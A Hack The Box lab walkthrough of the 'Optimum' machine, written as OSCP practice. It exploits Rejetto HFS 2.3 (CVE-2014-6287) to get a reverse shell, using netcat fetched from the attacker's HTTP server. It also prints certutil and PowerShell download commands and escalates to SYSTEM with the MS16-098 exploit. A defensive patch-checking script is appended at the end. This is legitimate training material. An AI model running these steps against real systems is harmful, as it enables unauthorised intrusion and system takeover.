In this practice box from Hack The Box (HTB), we explore one of the machines from TJNull’s list, which is widely recognized as part of the essential preparation for the Offensive Security Certified Professional (OSCP) exam. TJNull’s curated list is designed to help individuals hone their penetration testing skills and get accustomed to the types of challenges they’ll face during the OSCP. This particular box reflects the practical, hands-on nature of the OSCP certification process, providing an excellent opportunity for learners to test and expand their knowledge in a controlled, realistic environment. Whether you’re a seasoned security professional or just starting, working through this box will be a valuable step in your OSCP preparation journey.
Nmap scan
╭─kali@kali ~/HTB/optimum/results/10.10.10.8/scans
╰─$ cat _quick_tcp_nmap.txt
# Nmap 7.94 scan initiated Mon Oct 16 09:09:09 2023 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN /home/kali/HTB/optimum/results/10.10.10.8/scans/_quick_tcp_nmap.txt -oX /home/kali/HTB/optimum/results/10.10.10.8/scans/xml/_quick_tcp_nmap.xml 10.10.10.8
Nmap scan report for 10.10.10.8
Host is up, received user-set (0.34s latency).
Scanned at 2023-10-16 09:09:16 EDT for 35s
Not shown: 999 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack HttpFileServer httpd 2.3
|_http-favicon: Unknown favicon MD5: 759792EDD4EF8E6BC2D1877D27153CB1
|_http-server-header: HFS 2.3
|_http-title: HFS /
| http-methods:
|_ Supported Methods: GET HEAD POST
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Oct 16 09:09:51 2023 -- 1 IP address (1 host up) scanned in 41.67 seconds
Enumerating HttpFileServer httpd 2.3 (HFS 2.3) with searchsploit:
------------------------------------------------------------------------------------------------------ ---------------------------------
Apple Mac OSX 10.4.8 - DMG HFS+ DO_HFS_TRUNCATE Denial of Service | osx/dos/29454.txt
Apple Mac OSX 10.6 - HFS FileSystem (Denial of Service) | osx/dos/12375.c
Apple Mac OSX 10.6.x - HFS Subsystem Information Disclosure | osx/local/35488.c
Apple Mac OSX xnu 1228.x - 'hfs-fcntl' Kernel Privilege Escalation | osx/local/8266.sh
FHFS - FTP/HTTP File Server 2.1.2 Remote Command Execution | windows/remote/37985.py
HFS (HTTP File Server) 2.3.x - Remote Command Execution (3) | windows/remote/49584.py
HFS Http File Server 2.3m Build 300 - Buffer Overflow (PoC) | multiple/remote/48569.py
Linux Kernel 2.6.x - SquashFS Double-Free Denial of Service | linux/dos/28895.txt
Rejetto HTTP File Server (HFS) - Remote Command Execution (Metasploit) | windows/remote/34926.rb
Rejetto HTTP File Server (HFS) 1.5/2.x - Multiple Vulnerabilities | windows/remote/31056.py
Rejetto HTTP File Server (HFS) 2.2/2.3 - Arbitrary File Upload | multiple/remote/30850.txt
Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (1) | windows/remote/34668.txt
Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (2) | windows/remote/39161.py
Rejetto HTTP File Server (HFS) 2.3a/2.3b/2.3c - Remote Command Execution | windows/webapps/34852.txt
Using exploit 39161:
╭─kali@kali ~/HTB/optimum/results/10.10.10.8/exploit
╰─$ searchsploit -m windows/webapps/39161
Exploit: Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (2)
URL: https://www.exploit-db.com/exploits/39161
Path: /usr/share/exploitdb/exploits/windows/remote/39161.py
Codes: CVE-2014-6287, OSVDB-111386
Verified: True
File Type: Python script, ASCII text executable, with very long lines (540)
Copied to: /home/kali/HTB/optimum/results/10.10.10.8/exploit/39161.py
╭─kali@kali ~/HTB/optimum/results/10.10.10.8/exploit
╰─$
Comments at the top of the exploit script:
# Description: You can use HFS (HTTP File Server) to send and receive files.
# It's different from classic file sharing because it uses web technology to be more compatible with today's Internet.
# It also differs from classic web servers because it's very easy to use and runs "right out-of-the box". Access your remote files, over>
#Usage : python Exploit.py <Target IP address> <Target Port Number>
#EDB Note: You need to be using a web server hosting netcat (http://<attackers_ip>:80/nc.exe).
# You may need to run it multiple times for success!
Modify the script with the correct local IP address and listener port:
ip_addr = "10.10.14.31" #local IP address
local_port = "443" # Local Port number
Serve nc.exe over HTTP so the exploit can fetch it from the attacking machine:
39161.py 49125.py mini2-reverse.ps1 mini-reverse.ps1 nc.exe results
╭─kali@kali ~/HTB/optimum
╰─$ serve 80
Starting HTTP server on port 80...
====================================
certutil -urlcache -f http://10.10.14.31:80/file_to_download.txt C:\path\where\you\lile.txt
Invoke-WebRequest -Uri http://10.10.14.31:80/file_to_download.txt -OutFile C:\path\lile.txt
====================================
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
Start the listener and run the exploit (as the EDB note says, it may take more than one attempt):
╭─kali@kali ~/HTB/optimum
╰─$ python2.7 39161.py 10.10.10.8 80
╭─kali@kali ~/HTB/optimum
╰─$ python2.7 39161.py 10.10.10.8 80
╭─kali@kali ~/HTB/optimum
╰─$
We get a shell.
Run systeminfo on the target, save the output to a text file (sys.txt), and feed it to Windows Exploit Suggester:
╭─kali@kali ~/HTB/optimum/Windows-Exploit-Suggester ‹master●›
╰─$ python2.7 ./windows-exploit-suggester.py --database 2023-10-18-mssb.xls --systeminfo sys.txt
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
Among the results, this one is worth trying:
MS16-098: Security Update for Windows Kernel-Mode Drivers (3178466) - Important
[*] https://www.exploit-db.com/exploits/41020/ -- Microsoft Windows 8.1 (x64) - RGNOBJ Integer Overflow (MS16-098)
We upload the compiled exploit (41020.exe) to the machine, run it, and get an admin shell:
C:\Users\Public\Downloads>dir
dir
Volume in drive C has no label.
Volume Serial Number is EE82-226D
Directory of C:\Users\Public\Downloads
26/10/2023 03:27 <DIR> .
26/10/2023 03:27 <DIR> ..
26/10/2023 03:27 560.128 41020.exe
1 File(s) 560.128 bytes
2 Dir(s) 5.683.875.840 bytes free
C:\Users\Public\Downloads>41020.exe
41020.exe
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Users\Public\Downloads>whoamia
whoamia
'whoamia' is not recognized as an internal or external command,
operable program or batch file.
C:\Users\Public\Downloads>whoami /all
whoami /all
USER INFORMATION
----------------
User Name SID
=================== ========
nt authority\system S-1-5-18
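A defender-side check built from the two artifacts this write-up relies on, the Nmap scan that reveals HFS 2.3 and the systeminfo hotfix list that Windows Exploit Suggester compares against MS16-098. This is an added example, not part of the original post or of any tool it uses; the advisory table is limited to what the page cites (HFS 2.3 to CVE-2014-6287, MS16-098 to KB3178466), and the sample scan and systeminfo text are constructed.

```python
"""Flag a known-vulnerable HFS banner in Nmap -oN output and verify that the
MS16-098 hotfix is present in a systeminfo dump (added example, constructed data)."""
import re

# Banner -> note, taken from the searchsploit/EDB output in the write-up.
VULNERABLE_BANNERS = {
    "HttpFileServer httpd 2.3": "CVE-2014-6287 (Rejetto HFS 2.3.x remote command execution)",
}
# Bulletin -> KB number, as cited by Windows Exploit Suggester in the write-up.
REQUIRED_HOTFIXES = {"MS16-098": "KB3178466"}

# Matches an Nmap normal-output port line; group 4 holds reason + version text.
NMAP_PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+open\s+(\S+)\s+(.*)$")
HOTFIX_RE = re.compile(r"\bKB\d{6,7}\b")

def flag_nmap_services(nmap_text):
    """Return [(port, note)] for open ports whose version text matches a vulnerable banner."""
    hits = []
    for line in nmap_text.splitlines():
        m = NMAP_PORT_RE.match(line.strip())
        if not m:
            continue
        port, rest = int(m.group(1)), m.group(4)
        hits.extend((port, note) for banner, note in VULNERABLE_BANNERS.items() if banner in rest)
    return hits

def missing_hotfixes(systeminfo_text):
    """Return {bulletin: kb} for required KBs absent from the systeminfo hotfix list."""
    installed = set(HOTFIX_RE.findall(systeminfo_text))
    return {b: kb for b, kb in REQUIRED_HOTFIXES.items() if kb not in installed}

def report(nmap_text, systeminfo_text):
    """Human-readable findings combining both checks."""
    out = [f"port {p}: {n}" for p, n in flag_nmap_services(nmap_text)]
    out += [f"{b} not applied: {kb} missing from hotfix list" for b, kb in missing_hotfixes(systeminfo_text).items()]
    return out

# Constructed samples shaped like the write-up's scan and a systeminfo hotfix section.
SAMPLE_NMAP = """PORT   STATE SERVICE REASON          VERSION
80/tcp open  http    syn-ack ttl 127 HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
"""
SAMPLE_SYSTEMINFO = """OS Version:                6.3.9600 N/A Build 9600
Hotfix(s):                 2 Hotfix(s) Installed.
                           [01]: KB2919355
                           [02]: KB3000850
"""

if __name__ == "__main__":
    for finding in report(SAMPLE_NMAP, SAMPLE_SYSTEMINFO):
        print(finding)
```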